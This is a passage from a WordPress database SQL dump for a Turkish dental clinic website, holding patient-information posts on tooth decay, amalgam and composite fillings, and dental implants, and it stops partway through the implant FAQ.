diş hekimleri tükürük akışını artırdığı için şekersiz sakızları sıklıkla önerirler.\r\n\r\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır?</strong>\r\n<ul>\r\n 	<li>Sabah kahvaltısından sonra ve akşam yatmadan önce dişlerin fırçalanması ve her gün diş ipliğinin düzenli kullanılması en etkili yoldur.</li>\r\n 	<li>Yiyecek artıkları en çok dişlerin çiğneme yüzeylerindeki girintilerde ve dişlerin birbirine değdiği ara yüzeylerde biriktiği için, diş fırçaları küçük başlı seçilmelidir. Dişlerin iç yüzeyleri, dış yüzeyleri, çiğneyici yüzeyleri ve dilin üstü fırçalanmalı ve ara yüzlerde diş ipliği kullanılmalıdır.</li>\r\n 	<li>Fırçalar, orta derecede sert ya da yumuşak kıllı olmalı ve belirli aralıklarda değiştirilmelidirler. Fırça kıllarının aşınmamış olması ve bakteri taşımayacak bir şekilde muhafaza edilmesi gerekmektedir. Asla başkasının diş fırçası kullanılmamalıdır.</li>\r\n 	<li>Diş fırçalama sırasında florürlü bir diş macunu kullanılarak, florürün diş çürüğünü önlemedeki rolünden yararlanılmalıdır. Florürlü macunlara yardımcı olarak aynı zamanda ağız kokusunu gidererek ferahlık ve temizlik hissi veren florürlü gargaralar da kullanılabilir.</li>\r\n 	<li>Şekerli yiyecekleri ana öğünlerde tüketmeye çalışmak ve yemek aralarında bir şey yememeye gayret etmek de diğer bir önlemdir.</li>\r\n 	<li>Çürüğün bir ilacı yoktur bu nedenle diş hekimine muntazam aralıklarla başvurmak bir çürüğü önlemek ya da erken yakalamada en iyi yoldur. Ayrıca sıcak ve soğuğa duyarlı dişler ya da ağrılı dişlerde veya tebeşirimsi renkte olan başlangıç çürükleri, kahverengi renklemeler ve oyuklar gibi durumlarda vakit geçirilmeden hekime başvurulması tedavinin şeklini değiştirecek ve zorluğunu azaltacaktır.</li>\r\n</ul>\r\n<strong>Çürük tedavisinde kullanılan malzemeler nelerdir?</strong>\r\n<ul>\r\n 	<li>Çinko içerikli genelde geçici amaçla kullanılan maddeler,</li>\r\n 	<li>Kalsiyum içeren dişi iyileştirici özelliğe sahip maddeler,</li>\r\n 	<li>Gümüş, kalay, çinko, altın içeren dayanıklı maddeler,</li>\r\n 	<li>Cam, alüminyum, fosfat ve yapay reçinelerin bir karışımı olan estetik amaçlı kullanılan maddeler,</li>\r\n 	<li>Alüminyum silikat cam partiküllerinden oluşan çok çeşitli amaçlar ile kullanılan maddeler,</li>\r\n 	<li>Ağız dışında hazırlanıp dişe yapıştırılan blok malzemeler.</li>\r\n</ul>\r\n<strong>Amalgam Dolgu (Metal Dolgu) nedir?</strong>\r\n\r\nAmalgam dolgular gümüş dolgular olarak da tanımlanır. Amalgam; gümüş, kalay ve bakır alaşımının, cıva ile karıştırılması ile elde edilir. Karışımın %45-50`sini oluşturan civa, metalleri birbirine bağlayarak dayanıklı bir dolgu malzemesi yaratmış olur. Amalgam dolgular, 150 yıldan beri geliştirilerek kullanılmaktadır.\r\nAmalgam hala en zararsız, en uzun ömürlü ve en ucuz dolgu maddesidir. Yılda, bir milyardan fazla amalgam dolgu yapıldığı hesaplanmıştır. Diğer dolgu maddelerine oranla çok daha kısa zamanda ve kolay uygulanabilirler. Porselen, altın ve beyaz dolgular gibi dolgu malzemeleri hem daha pahalıdırlar hem de daha çok zaman ve dikkat isterler. Ayrıca altının dışındakiler amalgam kadar uzun ömürlü değildir. Amalgam ancak civaya alerjisi kesin olarak tespit edilenlerde kullanılmamalıdır ki, bu da yüzde birden çok daha düşük bir olasılıktır. Gerekmediğinde amalgam dolgular sökülmemelidir. Çünkü hem gereksiz masraf getirmekte hem de dişe zarar verme olasılığını artırmaktadır.\r\n\r\n<strong>Amalgamdaki civa zararlı mıdır?</strong>\r\n\r\nAmalgam dolgudaki civa zehirli değildir. Civa diğer metallerle birleştiğinde kimyasal yapısı değişir ve zararsız hale geçer. Çiğneme ve öğütme sonucunda ağızda açığa çıkan civa miktarı su, hava ve yiyeceklerde alınan miktardan çok daha küçüktür. Bütün bilimsel araştırmalarla civanın zararsız olduğu sonucuna varılmıştır. Amalgamlar söküldüğünde civanın oluşturduğu düşünülen bazı hastalıkların iyileştiği iddia edildiği halde bilimsel olarak ispatlanamamıştır.\r\n\r\n<strong>Amalgam restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Uygulamanın yapıldığı tarafın en az bir saat kullanılmaması ve takip eden 24 saat içinde dikkatli olunarak sert şeylerin o bölgede çiğnememesi gerekmektedir.</li>\r\n 	<li>Hekim işlemden 24 saat geçtikten sonra polisaj işlemi için ikinci bir randevu vermelidir. Bu uygulama, hekime, hem amalgamın metalik özelliklerini iyileştirme hem de kullanım sonrası restorasyonun anatomik ve fonksiyonel olarak tekrar gözden geçirilmesi olanağını sağlayacaktır.</li>\r\n 	<li>Amalgam dolgulardan sonra kısa süreli bir sıcak-soğuk duyarlılığı olabilmekte ve bu zamanla kaybolmaktadır. Ancak ender olsa da bazı kişilerde ağızda çeşitli metaller bulunduğunda ya da çatal gibi başka bir metal girdiğinde elektriklenmeden doğan hassasiyetler olabilmektedir. Geçmeyen duyarlılıklarda duyarlılığın yalnızca bu sebepten olduğuna emin olduktan sonra restorasyonun metal olmayan bir restoratif madde ile değiştirilmesi çözüm olabilir.</li>\r\n</ul>\r\n<strong>Kompozit Dolgu (diş renginde dolgu) nasıl uygulanır?</strong>\r\n\r\nKompozit reçine, içinde silikon dioksit parçacıkları olan bir plastik karışımdır. Diş renginde olduğu için beyaz dolgu olarak tanımlanırlar. 1960`larda yalnızca ön dişlerde kullanıldıkları halde materyalin ileri derecede geliştirilmesiyle çiğneme basınçlarına dayanıklı ve daha az aşınan bir dolgu maddesi olarak arka dişlerde de başarılı olarak uygulanabilmektedirler.\r\n\r\nKompozit dolgular, hazırlanmış kavitelere tabaka tabaka yerleştirilir ve her tabaka özel bir ışık ile sertleştirilir. Bu işlem bitince kompozit dolgular dişe göre şekillendirilir ve düzeltilir. Bütün bu işlemler amalgam dolgu işleminden daha uzun sürer. Ancak amalgamın en az iki katı kadar daha pahalıdır. Kompozit dolguların ağızda kalma süresi de 7-10 yıldır ki bu süre amalgamın ömrüne yakındır. Ancak çok büyük dolgularda durum amalgamın lehinedir.\r\nBu dolguların en büyük avantajları estetik olmalarıdır. Ayrıca bu dolgular dişlere iyice bağlandığı için diş dokularını destekler, kırılmaları ve sıcaklık geçmesini engeller. Kompozitler, yalnızca çürükleri restore etmek için değil, dişlerin rengini ve biçimini değiştirerek kozmetik etkileri için de kullanılabilmektedirler. En önemli dezavantajı işlem sonrası duyarlılıkların olmasıdır. Dolguların renkleri, kahve, çay gibi boyayıcı yiyeceklerle de hafifçe değişebilmektedir.\r\n\r\n<strong>Kompozit restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Kompozitlerde de artık aynı seansta polisaj işlemi yapılabilmektedir. Ancak çok büyük restorasyonlar ya da çok diş için yapılan seri restorasyonlarda hastanın bir defa daha kontrole gitmesi gerekebilir.</li>\r\n 	<li>Bu mateyallerle ön dişlerde çok büyük kayıplar restore edilebilmekte bu nedenle hastalar ısırma işlemi sırasında dikkatli olmalıdır.</li>\r\n 	<li>Özellikle fasial yüzde yapılan uygulamalardan sonra ne kadar iyi polisaj yapılmış olsa da boyayabilen yiyecek ve içecekler dolguların renklerini değiştirebilir.</li>\r\n 	<li>Aşınma nedeni ile restore edilmiş dişlerde daha çok dikkat edilmesi gereken şey çok sert olmayan diş fırçaları kullanmak ve fırçalama yöntemlerinde düzeltmeler yapabilmektir.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Diş Çürümesi ve Dolgular', '', 'publish', 'closed', 'closed', '', 'dis-curumesi-ve-dolgular', '', '', '2018-07-18 20:44:50', '2018-07-18 17:44:50', '', 0, 'http://www.ze-dent.com/?p=6254', 0, 'post', '', 0),
(6255, 1, '2018-07-13 13:17:44', '2018-07-13 10:17:44', '', 'dolgu', '', 'inherit', 'closed', 'closed', '', 'dolgu', '', '', '2018-07-13 13:17:44', '2018-07-13 10:17:44', '', 6254, 'http://www.ze-dent.com/wp-content/uploads/2018/07/dolgu.jpg', 0, 'attachment', 'image/jpeg', 0),
(6256, 1, '2018-07-13 13:18:25', '2018-07-13 10:18:25', '[vc_row][vc_column][vc_column_text]<strong>Dişler neden çürür?</strong>\r\n\r\nAğızda bulunan bakterilerden oluşan bakteri plağı, şekerli ve unlu yiyeceklerin ağızda kalan artıklarından asit oluşturabilmektedir. Bu asitler, dişlerin mineral dokusunu çözerek dişin minesinin bozulmasına ve sonuçta da diş çürüğünün başlamasına ve diş hekimlerinin \"kavite\" dedikleri oyuklara neden olmaktadırlar. Bunlar daha çok koyu renklenmelerle birlikte görülen oyuklardır.\r\n\r\nŞekerli ve unlu yiyeceklerle bakterilerin buluşması sonucunda çürükler oluştuğuna göre herkes için bir tehlike var demektir. Ancak beslenmelerinde karbonhidratlı ve şekerli yiyeceklerin oranı çok yüksek olanlar bir de sularında florür oranı çok düşükse çok daha fazla çürük tehlikesi altındadırlar. Bakteri plağı tarafından oluşturulan aside karşı tükürük doğal bir savunma mekanizması oluştursa da tek başına çürüğü önleyemez. Tükürük akışını ve miktarını azaltan hastalıklar ya da ilaçlar da çürük oluşumunu hızlandırmaktadırlar. Bu nedenle de diş hekimleri tükürük akışını artırdığı için şekersiz sakızları sıklıkla önerirler.\r\n\r\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır?</strong>\r\n\r\n<strong>Dişlerin çürümesini önlemek için neler yapılmalıdır? ile ilgili videolar</strong>\r\n<ul>\r\n 	<li>Sabah kahvaltısından sonra ve akşam yatmadan önce dişlerin fırçalanması ve her gün diş ipliğinin düzenli kullanılması en etkili yoldur.</li>\r\n 	<li>Yiyecek artıkları en çok dişlerin çiğneme yüzeylerindeki girintilerde ve dişlerin birbirine değdiği ara yüzeylerde biriktiği için, diş fırçaları küçük başlı seçilmelidir. Dişlerin iç yüzeyleri, dış yüzeyleri, çiğneyici yüzeyleri ve dilin üstü fırçalanmalı ve ara yüzlerde diş ipliği kullanılmalıdır.</li>\r\n 	<li>Fırçalar, orta derecede sert ya da yumuşak kıllı olmalı ve belirli aralıklarda değiştirilmelidirler. Fırça kıllarının aşınmamış olması ve bakteri taşımayacak bir şekilde muhafaza edilmesi gerekmektedir. Asla başkasının diş fırçası kullanılmamalıdır.</li>\r\n 	<li>Diş fırçalama sırasında florürlü bir diş macunu kullanılarak, florürün diş çürüğünü önlemedeki rolünden yararlanılmalıdır. Florürlü macunlara yardımcı olarak aynı zamanda ağız kokusunu gidererek ferahlık ve temizlik hissi veren florürlü gargaralar da kullanılabilir.</li>\r\n 	<li>Şekerli yiyecekleri ana öğünlerde tüketmeye çalışmak ve yemek aralarında bir şey yememeye gayret etmek de diğer bir önlemdir.</li>\r\n 	<li>Çürüğün bir ilacı yoktur bu nedenle diş hekimine muntazam aralıklarla başvurmak bir çürüğü önlemek ya da erken yakalamada en iyi yoldur. Ayrıca sıcak ve soğuğa duyarlı dişler ya da ağrılı dişlerde veya tebeşirimsi renkte olan başlangıç çürükleri, kahverengi renklemeler ve oyuklar gibi durumlarda vakit geçirilmeden hekime başvurulması tedavinin şeklini değiştirecek ve zorluğunu azaltacaktır.</li>\r\n</ul>\r\n<strong>Çürük tedavisinde kullanılan malzemeler nelerdir?</strong>\r\n<ul>\r\n 	<li>Çinko içerikli genelde geçici amaçla kullanılan maddeler,</li>\r\n 	<li>Kalsiyum içeren dişi iyileştirici özelliğe sahip maddeler,</li>\r\n 	<li>Gümüş, kalay, çinko, altın içeren dayanıklı maddeler,</li>\r\n 	<li>Cam, alüminyum, fosfat ve yapay reçinelerin bir karışımı olan estetik amaçlı kullanılan maddeler,</li>\r\n 	<li>Alüminyum silikat cam partiküllerinden oluşan çok çeşitli amaçlar ile kullanılan maddeler,</li>\r\n 	<li>Ağız dışında hazırlanıp dişe yapıştırılan blok malzemeler.</li>\r\n</ul>\r\n<strong>Amalgam Dolgu (Metal Dolgu) nedir?</strong>\r\n\r\nAmalgam dolgular gümüş dolgular olarak da tanımlanır. Amalgam; gümüş, kalay ve bakır alaşımının, cıva ile karıştırılması ile elde edilir. Karışımın %45-50`sini oluşturan civa, metalleri birbirine bağlayarak dayanıklı bir dolgu malzemesi yaratmış olur. Amalgam dolgular, 150 yıldan beri geliştirilerek kullanılmaktadır.\r\nAmalgam hala en zararsız, en uzun ömürlü ve en ucuz dolgu maddesidir. Yılda, bir milyardan fazla amalgam dolgu yapıldığı hesaplanmıştır. Diğer dolgu maddelerine oranla çok daha kısa zamanda ve kolay uygulanabilirler. Porselen, altın ve beyaz dolgular gibi dolgu malzemeleri hem daha pahalıdırlar hem de daha çok zaman ve dikkat isterler. Ayrıca altının dışındakiler amalgam kadar uzun ömürlü değildir. Amalgam ancak civaya alerjisi kesin olarak tespit edilenlerde kullanılmamalıdır ki, bu da yüzde birden çok daha düşük bir olasılıktır. Gerekmediğinde amalgam dolgular sökülmemelidir. Çünkü hem gereksiz masraf getirmekte hem de dişe zarar verme olasılığını artırmaktadır.\r\n\r\n<strong>Amalgamdaki civa zararlı mıdır?</strong>\r\n\r\nAmalgam dolgudaki civa zehirli değildir. Civa diğer metallerle birleştiğinde kimyasal yapısı değişir ve zararsız hale geçer. Çiğneme ve öğütme sonucunda ağızda açığa çıkan civa miktarı su, hava ve yiyeceklerde alınan miktardan çok daha küçüktür. Bütün bilimsel araştırmalarla civanın zararsız olduğu sonucuna varılmıştır. Amalgamlar söküldüğünde civanın oluşturduğu düşünülen bazı hastalıkların iyileştiği iddia edildiği halde bilimsel olarak ispatlanamamıştır.\r\n\r\n<strong>Amalgam restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Uygulamanın yapıldığı tarafın en az bir saat kullanılmaması ve takip eden 24 saat içinde dikkatli olunarak sert şeylerin o bölgede çiğnememesi gerekmektedir.</li>\r\n 	<li>Hekim işlemden 24 saat geçtikten sonra polisaj işlemi için ikinci bir randevu vermelidir. Bu uygulama, hekime, hem amalgamın metalik özelliklerini iyileştirme hem de kullanım sonrası restorasyonun anatomik ve fonksiyonel olarak tekrar gözden geçirilmesi olanağını sağlayacaktır.</li>\r\n 	<li>Amalgam dolgulardan sonra kısa süreli bir sıcak-soğuk duyarlılığı olabilmekte ve bu zamanla kaybolmaktadır. Ancak ender olsa da bazı kişilerde ağızda çeşitli metaller bulunduğunda ya da çatal gibi başka bir metal girdiğinde elektriklenmeden doğan hassasiyetler olabilmektedir. Geçmeyen duyarlılıklarda duyarlılığın yalnızca bu sebepten olduğuna emin olduktan sonra restorasyonun metal olmayan bir restoratif madde ile değiştirilmesi çözüm olabilir.</li>\r\n</ul>\r\n<strong>Kompozit Dolgu (diş renginde dolgu) nasıl uygulanır?</strong>\r\n\r\nKompozit reçine, içinde silikon dioksit parçacıkları olan bir plastik karışımdır. Diş renginde olduğu için beyaz dolgu olarak tanımlanırlar. 1960`larda yalnızca ön dişlerde kullanıldıkları halde materyalin ileri derecede geliştirilmesiyle çiğneme basınçlarına dayanıklı ve daha az aşınan bir dolgu maddesi olarak arka dişlerde de başarılı olarak uygulanabilmektedirler.\r\n\r\nKompozit dolgular, hazırlanmış kavitelere tabaka tabaka yerleştirilir ve her tabaka özel bir ışık ile sertleştirilir. Bu işlem bitince kompozit dolgular dişe göre şekillendirilir ve düzeltilir. Bütün bu işlemler amalgam dolgu işleminden daha uzun sürer. Ancak amalgamın en az iki katı kadar daha pahalıdır. Kompozit dolguların ağızda kalma süresi de 7-10 yıldır ki bu süre amalgamın ömrüne yakındır. Ancak çok büyük dolgularda durum amalgamın lehinedir.\r\nBu dolguların en büyük avantajları estetik olmalarıdır. Ayrıca bu dolgular dişlere iyice bağlandığı için diş dokularını destekler, kırılmaları ve sıcaklık geçmesini engeller. Kompozitler, yalnızca çürükleri restore etmek için değil, dişlerin rengini ve biçimini değiştirerek kozmetik etkileri için de kullanılabilmektedirler. En önemli dezavantajı işlem sonrası duyarlılıkların olmasıdır. Dolguların renkleri, kahve, çay gibi boyayıcı yiyeceklerle de hafifçe değişebilmektedir.\r\n\r\n<strong>Kompozit restorasyon sonrası nelere dikkat edilmelidir?</strong>\r\n<ul>\r\n 	<li>Kompozitlerde de artık aynı seansta polisaj işlemi yapılabilmektedir. Ancak çok büyük restorasyonlar ya da çok diş için yapılan seri restorasyonlarda hastanın bir defa daha kontrole gitmesi gerekebilir.</li>\r\n 	<li>Bu mateyallerle ön dişlerde çok büyük kayıplar restore edilebilmekte bu nedenle hastalar ısırma işlemi sırasında dikkatli olmalıdır.</li>\r\n 	<li>Özellikle fasial yüzde yapılan uygulamalardan sonra ne kadar iyi polisaj yapılmış olsa da boyayabilen yiyecek ve içecekler dolguların renklerini değiştirebilir.</li>\r\n 	<li>Aşınma nedeni ile restore edilmiş dişlerde daha çok dikkat edilmesi gereken şey çok sert olmayan diş fırçaları kullanmak ve fırçalama yöntemlerinde düzeltmeler yapabilmektir.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Diş Çürümesi ve Dolgular', '', 'inherit', 'closed', 'closed', '', '6254-revision-v1', '', '', '2018-07-13 13:18:25', '2018-07-13 10:18:25', '', 6254, 'http://www.ze-dent.com/6254-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6257, 1, '2018-07-13 13:24:54', '2018-07-13 10:24:54', '[vc_row][vc_column][vc_column_text]<strong>İmplant (diş ekme) nedir?</strong>\r\nKısaca implant, eksik olan dişlerin fonksiyon ve estetiğini tekrar sağlamak amacıyla çene kemiğine yerleştirilen ve uygun malzemeden yapılan yapay diş kökleridir.\r\n\r\n<strong>İmplant çeşitleri</strong>\r\nDeğişik implant tipleri üretilmiştir. Ancak günümüzde en popüler olan implant tipi ‘vida’ şekilli olanlardır.\r\n\r\n<strong>İmplantlar ile tedavi güvenli ve uzun ömürlü müdür?</strong>\r\nİlk diş implantları mısırlılar zamanında safir kullanılarak yapılmıştır. Güvenli bir implant ortaya çıkarmak için yapılan çalışmalar 1809’dan beri sürmektedir.\r\n\r\n<strong>İmplantlar her olayda kullanılabilir mi?</strong>\r\nİster tek diş, isterse birden fazla diş eksikliğinde eğer implant yerleştirmeye uygun miktarda kemik varsa, her olay için implant kullanılabilir.\r\n\r\n<strong>Her hastaya implant uygulanabilir mi?</strong>\r\nİmplant vidaları belirli kalınlığı ve genişliği olan yapılardır. Bu nedenle implant konulması öngörülen bölgede, çene kemiğinin, bu implant vidasını kabul edecek yükseklik ve genişliğe sahip olması gerekmektedir. Var olan kemiğin kalitesi de implant başarısını etkileyen faktörlerden birisidir. Ayrıca tedaviden önce ve implant ağızda kaldığı sürece dişetlerinin tamamen sağlıklı olması gerekmektedir. Hastanın genel sağlık durumu iyi olduğu sürece implant uygulamasını engelleyecek bir üst yaş limiti yoktur ancak kemik gelişimi tamamlanmamış çok genç hastalara uygulanması tercih edilmeyebilir.\r\n\r\n<strong>İmplant yerleştirilirken acı duyar mıyım?</strong>\r\nUygun anestezi yöntemlerinin uygulanması durumunda hayır. Operasyon sırasında hasta tercihine göre genel ya da lokal anestezi kullanılabilir. Genellikle implant’ın yerleştirildiği akşam duyulabilecek ağrı basit ağrı kesiciler ile giderilebilir. Birçok hasta bu ağrının normal diş çekiminden sonra duyulan ağrıdan farklı olmadığını belirtmektedir. Tedavinin problemsiz tamamlandığı vaka’lar da implantların varlığını bile hissetmeyecek kadar rahat olursunuz.\r\n\r\n<strong>Toplam tedavi süresi ne kadardır?</strong>\r\nİlk muayeneden, işiniz bitinceye kadar genellikle 5–6 ayrı randevuya gelmeniz gerekecektir. Bu randevuların süresi, yapılacak işin özelliklerine göre farklı uzunluklarda olacaktır. Tedavi alt çene için 3 – 5 ay gibi bir sürede bitirilebilirken üst çene için 6 ay kadar sürebilmektedir.\r\n\r\n<strong>İmplantların temizliği önemli midir?</strong>\r\nEvet. Hem de çok önemlidir. İmplantların ağız içindeki yabancı cisimler olduğu düşünülürse temizliklerinin en az kendi dişleriniz kadar hatta daha da önemli olduğunu takdir edersiniz. İmplantların temizlikleri belli bir öğrenme süreci gerektirse de, zor değildir. Ancak bu iş için yeterli zamanı ayırmanız gerekmektedir. Unutmamanız gereken şey, bu tip bir tedavinin başarılı olması için gerekli en önemli faktörün düzenli ağız bakımı olduğudur.\r\n\r\n<strong>İmplantlar üstüne yapılacak protezler nasıldır?</strong>\r\nİmplantlar üzerine yapılacak protezler vaka’nın özelliğine göre değişik tipte olabilir. Yani bunlar kolayca temizlenmesi amacı ile hasta tarafından çıkartılabilecek şekilde olabileceği gibi ancak diş hekimi tarafından çıkartılabilecek şekilde de planlanabilir. Her iki planlamanın da avantaj ve dezavantajları bulunmaktadır ve sizin için uygun olan tasarımı hekiminiz tedaviniz başlamadan önce size anlatacaktır.\r\n\r\n<strong>Eksik her diş için ´bir´ implant gerekir mi?</strong>\r\nHayır. Eğer eksik diş sayısı ‘1’den fazla ise implant uygulanacak bölgeye bağlı olarak tek bir implant 2 ya da 3 diş yerine hizmet verebilir.\r\n\r\n<strong>İmplant vidası kemik ile kaynaşmaz ise (osseointegre olmaz ise) ne olur?</strong>\r\nDoğru implant ve yöntem kullanılması durumunda böyle bir olasılık yok denecek kadar azdır. Bu tip bir başarısızlık genellikle cerrahi operasyonu takip eden ilk 6 ay içinde ortaya çıkar. Böyle bir durumda diş çekimi kadar kolay bir işlem ile implant yerinden çıkartılmalıdır. Bu bölgedeki kemiğin iyileşmesini takiben yeni bir implant konulabileceği gibi, klasik tip protezlerden birisi de tercih edilebilir. Ancak, genellikle, 2’den fazla implant konulan vaka’lar da arta kalan implantlar protezin de yeniden tasarlanması ile hizmet vermeye yeterli olmaktadır.\r\n\r\n<strong>İmplant tedavisi pahalı mıdır?</strong>\r\nMaalesef, evet. Kullanılan tüm malzemenin ithal olması ve sağlıklı implant üretimi için çok yüksek teknolojiye gereksinim duyulması tedavinin fiyatını belirlemektedir. Ülkemizin içinde bulunduğu ekonomik şartlar nedeniyle döviz kurlarında gözlenen artışlar da tedavinin maliyetini olumsuz etkilemektedir. Ancak kesin fiyat uzman hekimlerimizin sizi muayene edip, bu tedavi sekli için uygun bir hasta olup olmadığınızı belirlemeleri ve istediğiniz protez şekline göre değişecektir. İmplant yerleştirme işleminin karmaşıklığı ve uzunluğu, hastanın diş sağlığı ve ihtiyaçlarına bağlı olarak değişir ve sonuç büyük bir yatırım olabilir. Buna rağmen 350 hastaya implant yerleştirildikten sonra yapılan bir ankette, hastaların yaptıkları yatırımdan memnun kaldıkları ve gerekirse tekrar memnuniyetle yapacakları bulunmuştur.\r\n\r\n<strong>İmplant tedavisi nerede ve nasıl elde edilebilir?</strong>\r\nBu tip bir tedaviye başlamadan önce yeterli ve doğru bilgi almanız, her şeyden önce, kendi sağlığınız açısından gereklidir. Bu konuda, implant cerrahisi eğitimi almış diş hekimleri size gereken tüm rehberliği verebilecek bilgi birikimine sahiptir. Bunun dışında diş hekimliği fakülteleri de doğru bilgilendirilebileceğiniz kuruluşlardır. İmplant tedavisi, doğru seçilen vaka’larda ve usulüne uygun yapıldığı takdirde, hastaların yaşam kalitesini arttıran ve yüz güldüren bir tedavi yöntemidir. Bu denli başarılı bir tedavi yönteminden tüm dünya da olduğu gibi ülkemizdeki hastaların da yararlanması gerektiğine inandığımız için, implant tedavisi hakkında bilgi edinmek için yaptığınız başvurulardan herhangi bir ücret talep edilmeyecektir. Bu muayene sırasında tedaviye uygun bir hasta olup olmadığınızın ortaya çıkması için implantları yerleştirecek, üzerinin protezini yapacak ve daha sonraki periyodik dişeti bakımını üstlenecek uzman hekimlerin sizi muayene etmesi en doğru yöntemdir. Bu muayene sırasında sizden genel sağlık durumunuz hakkında bilgi alınacak ve gerekli görülürse birtakım tahlilleri yaptırmanız istenebilecektir. Bu asama da ayrıca çeşitli röntgen incelemeleri ve ağzınızın modellerinin elde edilmesi gerekebilecektir.\r\n\r\n<strong>İmplant tedavisinde gözlenebilecek riskler nelerdir?</strong>\r\nAğız içi ya da dışı tüm cerrahi işlemlerde gözlenebilecek risklerin ötesinde bir risk söz konusu değildir. Bunlar erken dönemde enfeksiyon ve alerji, protezlerin tamamlanmasından sonra ki geç dönemde ise yetersiz ağız temizliğine bağlı iltihaplanmalar şeklinde ortaya çıkabilir. Özellikle erken dönem iyileşmesi sırasında sigara kullanmak enfeksiyon riskini arttırmaktadır.\r\n\r\n<strong>İmplant tedavisi hangi vaka’larda ne avantajlar sunar?</strong>\r\n<ol>\r\n 	<li><strong>Alt çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Bu hastalar protezin hareketine bağlı olarak sürekli ağrıdan (vuruk) ve iyi çiğneyememekten şikayetçidirler. Bu şikâyet zaman içinde proteze destek olan kemik dokunun erimesi ile daha da artar hale gelir. Bu tip hastalarda implant tedavisi yukarıdaki tüm şikâyetleri ortadan kaldırdığı gibi kemiğin erimesini de durdurmaktadır.</li>\r\n 	<li><strong>Üst çenede tamamen dişlerini kaybedip protez taşıyan hastalar:</strong> Üst protezler alt çene protezlerine oranla daha stabil olsalar da protezin damağı kapatan tasarımı tat alma duygusunu azaltıp mide bulantısına neden olabilmektedir.</li>\r\n 	<li><strong>Alt ya da üst çenede dişlerinin bir kısmını kaybetmiş hastalar:</strong> Bu hastaların şikâyeti kancalarla tutunan protezin çirkin görüntüsü, ya da köprü yapılabilmesi için sağlam dişlerini kestirme zorunluluğu olarak sayılabilir.</li>\r\n 	<li><strong>Tek dişini kaybetmiş hastalar:</strong> Bu hastalar tek bir dişin restorasyonu için en az komşu iki dişi feda etmek zorunda olan hastalardır. Tek bir implant’ın yerleştirilmesi komşu dişleri kurtardığı gibi daha estetik ve fonksiyonel sonuçların ortaya çıkmasına da neden olur.</li>\r\n</ol>\r\n<strong>İmplant tedavisinin dezavantajları nelerdir?</strong>\r\n<ul>\r\n 	<li>Yüksek fiyat</li>\r\n 	<li>Çok özenli ve zaman ayrılarak yapılması gereken ağız temizliği işlemi</li>\r\n</ul>\r\n<strong>İmplant tedavisinin avantajları nelerdir?</strong>\r\n<ul>\r\n 	<li>Daha iyi çiğneyebilme – Her istediğini yiyebilme</li>\r\n 	<li>Daha iyi estetik görünüm</li>\r\n 	<li>Özgüvenin geri kazanılması ile daha mutlu bir sosyal hayat</li>\r\n 	<li>Her şeyi yiyebilmeye bağlı olarak daha sağlıklı ve dengeli beslenme</li>\r\n</ul>\r\n<strong>İmplant muayenesinde neler yapılacak?</strong>\r\nBu muayene sırasında tedaviye uygun bir hasta olup olmadığınızın ortaya çıkması için implantları yerleştirecek, üzerinin protezini yapacak ve daha sonraki periyodik dişeti bakımını üstlenecek uzman hekimlerin sizi muayene etmesi en doğru yöntemdir. Bu muayene sırasında sizden genel sağlık durumunuz hakkında bilgi alınacak ve gerekli görülürse birtakım tahlilleri yaptırmanız istenebilecektir. Bu aşama da ayrıca çeşitli röntgen incelemeleri ve ağzınızın modellerinin elde edilmesi gerekebilecektir.\r\n\r\n<strong>Bütün implantlar başarılı mı?</strong>\r\nİmplant yerleştirme kararına varırken göz önünde bulundurulması gereken birçok faktör vardır. Öncelikle hasta sağlıklı olmalı, hastanın iyileşme gücü olmalıdır. Örneğin hasta, kontrol edilmeyen şeker hastası ise yarı-iyileşme komplikasyon yaratabilir. Bu hastalık implantların yerleştirilmesi tamamlandıktan sonra gelişirse de implantların gelecekteki durumlarında komplikasyonlara yol açabilir. Ayrıca hasta muayene edilmeli, hastaya uygun implant ve implantı yerleştirme yöntemi özenle seçilmelidir. İmplantlar diş hekimi tarafından özenle yerleştirilip bakılmasının yanı sıra hastadan da özel ilgi görmelidir. Diş hekimi veya hasta implantlara iyi bakamazsa komplikasyonlar ortaya çıkabilir. Bunların yanı sıra sigara\r\niçen ve fazla alkol kullanan hastalarda implantların başarısı etkilenmektedir.\r\n\r\n<strong>İmplantların ömrü ne kadar?</strong>\r\nİmplantların ağızda otuz yıl kadar sorunsuz kaldığı görülmüştür. Fakat implantlardan ortalama beklenti bundan kısadır. İmplantın ömrü birçok etkene bağlıdır. Hastanın sağlığı ve implantların iyi bakımı bunların ikisidir. Sonuçta implantlar bir ömür boyu kullanılabilirler. Ömürlerini etkileyen birçok etkeni ve sizin risklerinizi diş hekiminiz size açıklayacaktır.\r\n\r\n<strong>İmplant yapma kararında yaşlılık etken faktör mü?</strong>\r\nHayır. Sağlık yaştan çok daha önemli bir faktördür. 70-80’lerindeki birçok hastanın cerrahi riskleri daha genç fakat sağlık sorunu olan hastalardan daha azdır. Ayrıca daha yaşlı kişilerin implanta ihtiyacı gençlerin ihtiyaçlarından daha olasıdır çünkü yaşlılarda daha çok diş kaybı olmuştur.\r\n\r\n<strong>İmplantların vücut tarafından reddedilme riski var mı?</strong>\r\nİmplantlar organizma için herhangi bir yan etkisi olmayan maddelerden yapılmış ve yıllardır yoğun araştırmalara tabi tutulmuştur. Bu maddeler genellikle titanyum gibi metaller ve hiç bir zaman canlı bir organizmanın parçası olmayan benzeri diğer maddelerdir. Vücudun bunlara karşı antijen üretip kalp ve böbrek transplantlarında olduğu gibi reddetmesi mümkün değildir.\r\n\r\n<strong>Kanser riski var mı?</strong>\r\nTıbbi literatürde implantların kansere neden olduğunu gösteren hiç bir bulguya 